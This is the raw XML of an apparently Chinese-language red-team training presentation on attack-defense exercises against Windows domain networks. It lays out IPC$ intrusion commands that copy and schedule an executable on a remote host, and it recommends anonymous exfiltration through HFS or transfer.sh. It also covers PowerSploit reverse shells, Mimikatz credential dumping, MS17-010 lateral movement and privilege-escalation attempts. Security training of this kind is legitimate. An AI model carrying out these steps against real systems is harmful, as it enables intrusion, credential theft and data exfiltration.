              <a:t>PSEXEC</a:t>
            </a:r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1800" dirty="0" smtClean="0"/>
              <a:t>IPC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>入侵：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>D:&gt;net use \127.0.0.25\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>ipc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>$#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>127.0.0.25</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>IPC$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>共享</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>D:&gt;copy srv.exe \127.0.0.25\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>ipc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>$#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>复制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>srv.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>上去</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>D:&gt;net time \127.0.0.25#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>查时间</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>D:&gt;at</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>\127.0.0.25 10:50 srv.exe#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>at</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>命令在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>50</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>分启动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>srv.exe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743" y="2682139"/>
            <a:ext cx="5892165" cy="1802424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882128"/>
            <a:ext cx="8372163" cy="5833632"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>背景介绍</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b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攻防演习是检验目标网络安全防护体系的最有效方式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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桌面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>推演、模拟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>演练、实战演习</a:t>
            </a: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800" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>重点：实战演习，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>真实生产</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>环境中进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，从攻击者的角度全面检验现有安全防护体系的有效性，真实反映安全防护</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>能力与现状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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>演习</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>概况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0" y="1706733"/>
            <a:ext cx="6228079" cy="3799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数据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回传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HFS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Transfer.sh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（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/dutchcoders/transfer.sh.git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）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借用外部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FTP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服务器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HFS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>回传数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HFS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>服务启动后，可以通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>curl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>发送文件到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HFS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>地址；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zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>类似</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Transfer.sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>等中转网盘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>推荐，具有极高的匿名性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>: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28" y="3997695"/>
            <a:ext cx="6522237" cy="181917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zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>范例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>说明：典型的域环境拓展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Step1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Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>获取反向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>shell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使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>powersploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>反弹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean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1800" dirty="0" smtClean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1600" dirty="0" smtClean="0"/>
              <a:t>Step2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>隐蔽探测内网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600" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>PowerSploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>Invoke-Portscan.ps1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>脚本隐蔽探测内网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2118360"/>
            <a:ext cx="4450080" cy="1611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9" y="4431306"/>
            <a:ext cx="8758082" cy="2282196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1077686"/>
            <a:ext cx="8372163" cy="5529490"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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Step3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Powershell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获取用户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口令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tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>当获取主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的权限之后可以尝试获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>用户口令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后续根据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>密码组成规则</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>去猜证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tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>使用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PowerSploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Invoke-Mimikatz.ps1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>脚本读取在内存中的用户口令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800" dirty="0" smtClean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800" dirty="0" smtClean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endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean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Step4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：使用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Powershell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定位域管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/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>Powerview</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>定位域管理员在线登陆的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>主机</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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1026" name="Picture 2" descr="PowerShellæ»é²è¿é¶ç¯ï¼nishangå·¥å·ç¨æ³è¯¦è§£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79" y="2073245"/>
            <a:ext cx="4993027" cy="197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5" y="4700677"/>
            <a:ext cx="4839975" cy="19402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4000" y="5242560"/>
            <a:ext cx="382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域管账号口令可登陆内网中任意一台主机，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>核心信息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Step5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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：使用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永恒之蓝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”(MS17-010)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横向拓展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使用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MS17-010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攻击域管理员登陆的主机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Step6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：域内迅速扩张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/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>抓取域管理员的口令之后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MSF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>smb_login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>模块快速扩大内网</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>控制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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42445"/>
            <a:ext cx="5384906" cy="23613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9910" y="5301091"/>
            <a:ext cx="3326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use auxiliary/scanner/smb/smb_login</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1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" y="4768563"/>
            <a:ext cx="7863840" cy="18379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906" y="2517877"/>
            <a:ext cx="3759094" cy="107958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505106" y="3681354"/>
            <a:ext cx="3518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FangSong" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="FangSong" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="FangSong" panose="02010609060101010101" charset="-122"/>
              </a:rPr>
              <a:t>use auxiliary/scanner/smb/smb_login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内网拓扑图环境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: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19200" y="1981200"/>
            <a:ext cx="7071360" cy="462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Step1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>：权限提升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上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>传免杀的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>PAYLOAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>到机器名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>PAVMSEF21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>10.51.0.21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>服务器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/>
              <a:t>2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WEBSHELL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>下面运行，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>反弹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>3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低</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>的权限级别将会受到很多的限制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Guset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>User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Administrator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System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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800" dirty="0"/>
              <a:t>查看当前用户的权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>                               普通域账户</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN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64" y="3007579"/>
            <a:ext cx="4844123" cy="3630626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Step1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>：尝试权限提升（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>失败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0" lvl="1" indent="266700">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>Webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>反弹这台</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>边界主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>MSF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="266700">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>、尝试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>ms15_051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ms15_078</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>， </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>bypassuac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>等漏洞进行提权，但是都失败了。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0"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 descr="mark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35200" y="2694806"/>
            <a:ext cx="5140960" cy="264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mark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35200" y="5440681"/>
            <a:ext cx="5140960" cy="116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Step2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>：信息收集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、提升</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>第一台边界主机的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>没有成功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/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>、使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>该机器作为跳板攻击其他</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>机器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>、搜集网络信息作为渗透支撑</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>user /domain </a:t>
            </a:r>
            <a:r>
